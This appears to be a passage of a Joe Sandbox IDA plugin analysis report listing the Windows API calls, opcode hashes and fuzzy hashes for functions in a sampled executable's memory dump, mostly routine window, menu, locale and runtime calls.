                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Capture$MessageReleaseSendUpdate$EmptyIconicRectRedrawZoomed
                                                                  • String ID:
                                                                  • API String ID: 2500574155-0
                                                                  • Opcode ID: 072353aa878ca9d242668363f1bb6493957fc49ca9016f59aa4e242d7bb7b83d
                                                                  • Instruction ID: 0b468fde60a15a5f10e51a235b01b831e3748ee628679b9dc5fd4c49ca28e421
                                                                  • Opcode Fuzzy Hash: 072353aa878ca9d242668363f1bb6493957fc49ca9016f59aa4e242d7bb7b83d
                                                                  • Instruction Fuzzy Hash: 9DA15A74604644AFCF119F65C8C9AAE7BB6BF44350F1541B9FD599F2A6CB30C940DB10
                                                                  APIs
                                                                  • IsWindow.USER32(?), ref: 00212752
                                                                  • GetFocus.USER32 ref: 00212760
                                                                  • IsChild.USER32(?,?), ref: 00212794
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 002127C8
                                                                  • IsChild.USER32(?,?), ref: 002127E4
                                                                  • SendMessageW.USER32(?,00000100,?,00000000), ref: 00212813
                                                                  • IsIconic.USER32(?), ref: 00212854
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 002128DA
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 002128EC
                                                                  • GetAsyncKeyState.USER32(00000010), ref: 002128F9
                                                                  • IsWindowVisible.USER32(?), ref: 0021295A
                                                                    • Part of subcall function 0021F443: RedrawWindow.USER32(?,00000000,00000000,00000105,00000000), ref: 0021F470
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: AsyncStateWindow$ChildMessageSend$FocusIconicRedrawVisible
                                                                  • String ID:
                                                                  • API String ID: 763474574-0
                                                                  • Opcode ID: fc50a1a8f0455613577762838f6f80d8233cdbf30cb113b4839fcb2710c23938
                                                                  • Instruction ID: b00430ccb1942a977d14eeedbd3fb43c84af5d9b7b6cbf93e7bc5e5baccad208
                                                                  • Opcode Fuzzy Hash: fc50a1a8f0455613577762838f6f80d8233cdbf30cb113b4839fcb2710c23938
                                                                  • Instruction Fuzzy Hash: 9471E732620246DFDB209F64C8C5BEAB7E9BB64340F154578F985DB2A0DB719CB88B50
                                                                  APIs
                                                                  • GetSystemMetrics.USER32(00000021), ref: 002131D5
                                                                  • GetSystemMetrics.USER32(00000020), ref: 002131DC
                                                                  • IsIconic.USER32(?), ref: 002131F0
                                                                  • GetWindowRect.USER32(?,00000020), ref: 00213231
                                                                  • IsIconic.USER32(?), ref: 00213255
                                                                  • GetSystemMetrics.USER32(00000004), ref: 00213261
                                                                  • OffsetRect.USER32(00000020,?,?), ref: 00213273
                                                                  • GetSystemMetrics.USER32(00000004), ref: 0021327B
                                                                  • IsIconic.USER32(?), ref: 002132A9
                                                                  • GetSystemMetrics.USER32(00000021), ref: 002132B5
                                                                  • GetSystemMetrics.USER32(00000020), ref: 002132BC
                                                                    • Part of subcall function 001DCBFE: GetWindowLongW.USER32(?,000000F0), ref: 001DCC09
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$Iconic$RectWindow$LongOffset
                                                                  • String ID:
                                                                  • API String ID: 993849457-0
                                                                  • Opcode ID: 870e955d671e5e9d8a396b9a4b7d5ca0fff7804797f1dc3dbdd6a58ddcdda972
                                                                  • Instruction ID: 6995f9e8e3ed4f563a48f82403045590d473c3f41a3dddb9c0a5d95f7e63a86c
                                                                  • Opcode Fuzzy Hash: 870e955d671e5e9d8a396b9a4b7d5ca0fff7804797f1dc3dbdd6a58ddcdda972
                                                                  • Instruction Fuzzy Hash: 8E410AB1A0020A9FCF14DFA9D985BAEBBF9FF58300F144069E949EB251DB30A940CF54
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ClientScreenWindow_free_memset
                                                                  • String ID: 0
                                                                  • API String ID: 2869304798-4108050209
                                                                  • Opcode ID: f05d5cd00e2384f6bbc85bb3d0014efa36c83383de38ec08db4ae33a11932244
                                                                  • Instruction ID: 6347a6e4ee8b0cc2d8a52f1fe93a63377dc771e50687c8268fae0baa6cfe4ae0
                                                                  • Opcode Fuzzy Hash: f05d5cd00e2384f6bbc85bb3d0014efa36c83383de38ec08db4ae33a11932244
                                                                  • Instruction Fuzzy Hash: 49518D30B203059FDB20DFA4D988BADBBB5BF14310F90412AE956A72D2DB759C91CB52
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 002134D9
                                                                  • ScreenToClient.USER32(?,?), ref: 00213557
                                                                  • GetSystemMetrics.USER32(00000021), ref: 00213565
                                                                  • GetSystemMetrics.USER32(00000020), ref: 0021356E
                                                                  • IsIconic.USER32(?), ref: 0021357C
                                                                  • GetSystemMetrics.USER32(00000004), ref: 00213588
                                                                  • PtInRect.USER32(00000000,?,?), ref: 002135CF
                                                                  • PtInRect.USER32(?,?,?), ref: 002135F8
                                                                  • GetSystemMetrics.USER32(00000004), ref: 0021360E
                                                                  • PtInRect.USER32(00000020,?,?), ref: 00213626
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$Rect$ClientIconicScreenVisibleWindow
                                                                  • String ID:
                                                                  • API String ID: 1122842830-0
                                                                  • Opcode ID: 5a73bc7763a929d7449d56836dfad94bc9693baaddf99a04487ac9347d3ddf90
                                                                  • Instruction ID: 84502da98cf9ebb927b6c31645adcdfa9e2886c9d72b9ab61399f809668f76c5
                                                                  • Opcode Fuzzy Hash: 5a73bc7763a929d7449d56836dfad94bc9693baaddf99a04487ac9347d3ddf90
                                                                  • Instruction Fuzzy Hash: 35514171A1015AAFCB10DF64D884AEEB7FAFF18750F544069E909EB250DB70EE51CB90
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 0021FE4B
                                                                    • Part of subcall function 0021F798: GetParent.USER32(?), ref: 0021F7AE
                                                                    • Part of subcall function 0021F798: GetSystemMenu.USER32(?,00000000,?,00000000,?,?,?,0021FE6E,?), ref: 0021F7CD
                                                                    • Part of subcall function 0021F798: SetMenuDefaultItem.USER32(?,0000F060,00000000,00000000,?,?,?,0021FE6E,?), ref: 0021F7F6
                                                                    • Part of subcall function 0021F798: GetParent.USER32(?), ref: 0021F7FF
                                                                    • Part of subcall function 0021F798: IsZoomed.USER32(?), ref: 0021F80A
                                                                    • Part of subcall function 0021F798: EnableMenuItem.USER32(?,0000F000,00000003), ref: 0021F824
                                                                    • Part of subcall function 0021F798: EnableMenuItem.USER32(?,0000F010,00000003), ref: 0021F830
                                                                    • Part of subcall function 0021F798: EnableMenuItem.USER32(?,0000F030,00000003), ref: 0021F83C
                                                                    • Part of subcall function 0021F798: EnableMenuItem.USER32(?,0000F030,00000000), ref: 0021F873
                                                                    • Part of subcall function 0021F798: GetParent.USER32(?), ref: 0021F87B
                                                                    • Part of subcall function 0021F798: DeleteMenu.USER32(?,0000F120,00000000,00000000,?,?,?,0021FE6E,?), ref: 0021F8A1
                                                                    • Part of subcall function 0021F798: DeleteMenu.USER32(?,0000F030,00000000,?,?,?,0021FE6E,?), ref: 0021F8AD
                                                                    • Part of subcall function 0021F798: GetParent.USER32(?), ref: 0021F8B5
                                                                    • Part of subcall function 0021F798: DeleteMenu.USER32(?,0000F020,00000000,00000000,?,?,?,0021FE6E,?), ref: 0021F8D5
                                                                    • Part of subcall function 0021F798: GetParent.USER32(?), ref: 0021F8E7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$ItemParent$Enable$Delete$DefaultRectSystemWindowZoomed
                                                                  • String ID: y
                                                                  • API String ID: 540879578-4225443349
                                                                  • Opcode ID: 7697640a474136e39b7c4febe255f2960cd9aecddb99c75a58f37b229c42c66a
                                                                  • Instruction ID: 03d7cc026103bc0d415fb4fb2b87c10a3e04daa44b9ebdc03d2a047ddcd9d600
                                                                  • Opcode Fuzzy Hash: 7697640a474136e39b7c4febe255f2960cd9aecddb99c75a58f37b229c42c66a
                                                                  • Instruction Fuzzy Hash: 4E31C67292020A9BCF60DF68CA857EE77F4AB79310F21443AE865EB562D7708D91CF50
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 001DD5F7
                                                                  • GetFullPathNameW.KERNEL32(00000000,00000104,?,?,00000268,001DD7D2,?,?,00000000), ref: 001DD635
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  • PathIsUNCW.SHLWAPI(?,00000000), ref: 001DD6B1
                                                                  • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 001DD6D8
                                                                  • CharUpperW.USER32(?), ref: 001DD70B
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 001DD727
                                                                  • FindClose.KERNEL32(00000000), ref: 001DD733
                                                                  • lstrlenW.KERNEL32(?), ref: 001DD751
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
                                                                  • String ID:
                                                                  • API String ID: 624941980-0
                                                                  • Opcode ID: 483ed810c27ef4deb090e887c1f7339cdd3f296ac221d8cc302eca9b47397b3b
                                                                  • Instruction ID: b3e9fc2229e447eafd4ff110fad4d16756c6b5375675f0fcfdf7b27fe49dde26
                                                                  • Opcode Fuzzy Hash: 483ed810c27ef4deb090e887c1f7339cdd3f296ac221d8cc302eca9b47397b3b
                                                                  • Instruction Fuzzy Hash: EA4161719042159BDF25AB60DC9DFBE7679AF20314F1402DAB91AA2291DF31DE80DF50
                                                                  APIs
                                                                    • Part of subcall function 001D1231: __EH_prolog3_catch.LIBCMT ref: 001D1238
                                                                  • GetUserDefaultUILanguage.KERNEL32(00000000,00000005,002B8686,00000000,?,?,002978C4,00000000,?,00297C5F,00000000,0000001C,002979F2,00000000,00297C5F), ref: 002B86ED
                                                                  • FindResourceExW.KERNEL32(00000000,00000005,?,0000FC11,?,?,002978C4,00000000,?,00297C5F,00000000,0000001C,002979F2,00000000,00297C5F), ref: 002B872B
                                                                  • FindResourceW.KERNEL32(00000000,?,00000005,?,?,002978C4,00000000,?,00297C5F,00000000,0000001C,002979F2,00000000,00297C5F), ref: 002B8744
                                                                  • LoadResource.KERNEL32(00000000,00000000,?,?,002978C4,00000000,?,00297C5F,00000000,0000001C,002979F2,00000000,00297C5F), ref: 002B8752
                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000005,002B8686,00000000,?,?,002978C4,00000000,?,00297C5F,00000000,0000001C,002979F2,00000000,00297C5F), ref: 002B8782
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$Find$AllocDefaultException@8GlobalH_prolog3H_prolog3_catchLanguageLoadThrowUser
                                                                  • String ID: MS UI Gothic
                                                                  • API String ID: 2010067809-1905310704
                                                                  • Opcode ID: 55b5994922171f69b4ac0b7d10987755ba3af23418982a0ccc734b97fbcd6824
                                                                  • Instruction ID: 6e2c5100c7e6b6d7f5172ba288b47f87bce8359276b1efe4573c1a5b500332a4
                                                                  • Opcode Fuzzy Hash: 55b5994922171f69b4ac0b7d10987755ba3af23418982a0ccc734b97fbcd6824
                                                                  • Instruction Fuzzy Hash: 84314975610106AFDB116F64DC8AEBA776DEF60354B148029FD09DF291EF30DC51DA60
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000362,0000E002,00000000), ref: 002079CF
                                                                  • UpdateWindow.USER32(?), ref: 002079E6
                                                                  • GetKeyState.USER32(00000079), ref: 00207A0B
                                                                  • GetKeyState.USER32(00000012), ref: 00207A18
                                                                  • GetParent.USER32(?), ref: 00207ACE
                                                                  • PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 00207AEA
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: MessageState$Exception@8H_prolog3ParentPostSendThrowUpdateWindow
                                                                  • String ID:
                                                                  • API String ID: 2390574533-0
                                                                  • Opcode ID: 5f260c0826007cb8ee4a93433d5e39f6c7e377620d74463f1a9b6ad90b8d5000
                                                                  • Instruction ID: 42c0622e90083757a994874da41c8080e669733ba3c1f90149a995895265d3f4
                                                                  • Opcode Fuzzy Hash: 5f260c0826007cb8ee4a93433d5e39f6c7e377620d74463f1a9b6ad90b8d5000
                                                                  • Instruction Fuzzy Hash: 9441B231B147479BE7209F20C848FAEB7B5BF50711F204928E99A572D3DBB4BE908B50
                                                                  APIs
                                                                    • Part of subcall function 001DCC18: GetWindowLongW.USER32(?,000000EC), ref: 001DCC23
                                                                  • GetClientRect.USER32(?,?), ref: 00210674
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 0021071A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: AsyncClientLongRectStateWindow
                                                                  • String ID: '
                                                                  • API String ID: 304971295-1997036262
                                                                  • Opcode ID: d624a9f1a43078d50741c892e27104a88f1486de84c1f753eed06b77657986b1
                                                                  • Instruction ID: b8a692030a620fe58d790712f5dc669af4d85b90fdd9feaee4d57aeea4b5e90b
                                                                  • Opcode Fuzzy Hash: d624a9f1a43078d50741c892e27104a88f1486de84c1f753eed06b77657986b1
                                                                  • Instruction Fuzzy Hash: 10B18F307242069BDB299F64C5D8BFEB7E6BF64304F25012DE5069B291DBB09DE0CB80
                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,002D291C,?,002C6683,?,000000BC,?,00000001,00000000,00000000), ref: 002D231E
                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,002D291C,?,002C6683,?,000000BC,?,00000001,00000000,00000000), ref: 002D2347
                                                                  • GetACP.KERNEL32(?,?,002D291C,?,002C6683,?,000000BC,?,00000001,00000000), ref: 002D235B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID: ACP$OCP
                                                                  • API String ID: 2299586839-711371036
                                                                  • Opcode ID: d4ac36c9b0ac6584b65d90ba181c057e592320aecfec6a7c8e07a2575233d55b
                                                                  • Instruction ID: 503ce62a2c0931ce008137d47de01a1d64a96e04ea06f5608ad1377f372031b6
                                                                  • Opcode Fuzzy Hash: d4ac36c9b0ac6584b65d90ba181c057e592320aecfec6a7c8e07a2575233d55b
                                                                  • Instruction Fuzzy Hash: BE014730225747FAEB269F10FC09FDF72A8AF14318F20809AF545E11C0EB64DE658650
                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32 ref: 002C3B2F
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002C3B44
                                                                  • UnhandledExceptionFilter.KERNEL32(0030DB00), ref: 002C3B4F
                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 002C3B6B
                                                                  • TerminateProcess.KERNEL32(00000000), ref: 002C3B72
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                  • String ID:
                                                                  • API String ID: 2579439406-0
                                                                  • Opcode ID: 07b778a9fe21aeaa62c251e58e274f9be79b67e7cfc688b649e4cd411dbc4d6d
                                                                  • Instruction ID: 1aa6eeb00ec8e90c5b57747e4cf3497222ea8ae51a87cb7c0a5f267c9a9a091b
                                                                  • Opcode Fuzzy Hash: 07b778a9fe21aeaa62c251e58e274f9be79b67e7cfc688b649e4cd411dbc4d6d
                                                                  • Instruction Fuzzy Hash: 0A21EEB88123459FD742DF28FCD96847BBAFB08745F60551AFA088B770EBB05A808F45
                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(00000800,00000003,00000800,00000004), ref: 001C8F54
                                                                  • __snwprintf_s.LIBCMT ref: 001C8F8F
                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 001C8FDA
                                                                    • Part of subcall function 002BE629: __getptd_noexit.LIBCMT ref: 002BE629
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s
                                                                  • String ID: LOC
                                                                  • API String ID: 3175857669-519433814
                                                                  • Opcode ID: 3fa1185204cab5c58c337984e767e009b3e63e1f5a3a9dbe7c63cf7500c3a3b9
                                                                  • Instruction ID: 7b8ddde05bb8dda678126a6dbbcc8575f666109d56a0b549a2ba59419abe7665
                                                                  • Opcode Fuzzy Hash: 3fa1185204cab5c58c337984e767e009b3e63e1f5a3a9dbe7c63cf7500c3a3b9
                                                                  • Instruction Fuzzy Hash: 28218E71911218ABDF21BB64DC8AFEA77A9AF60714F5100EDB104AB0D1EF74AE50CF61
                                                                  APIs
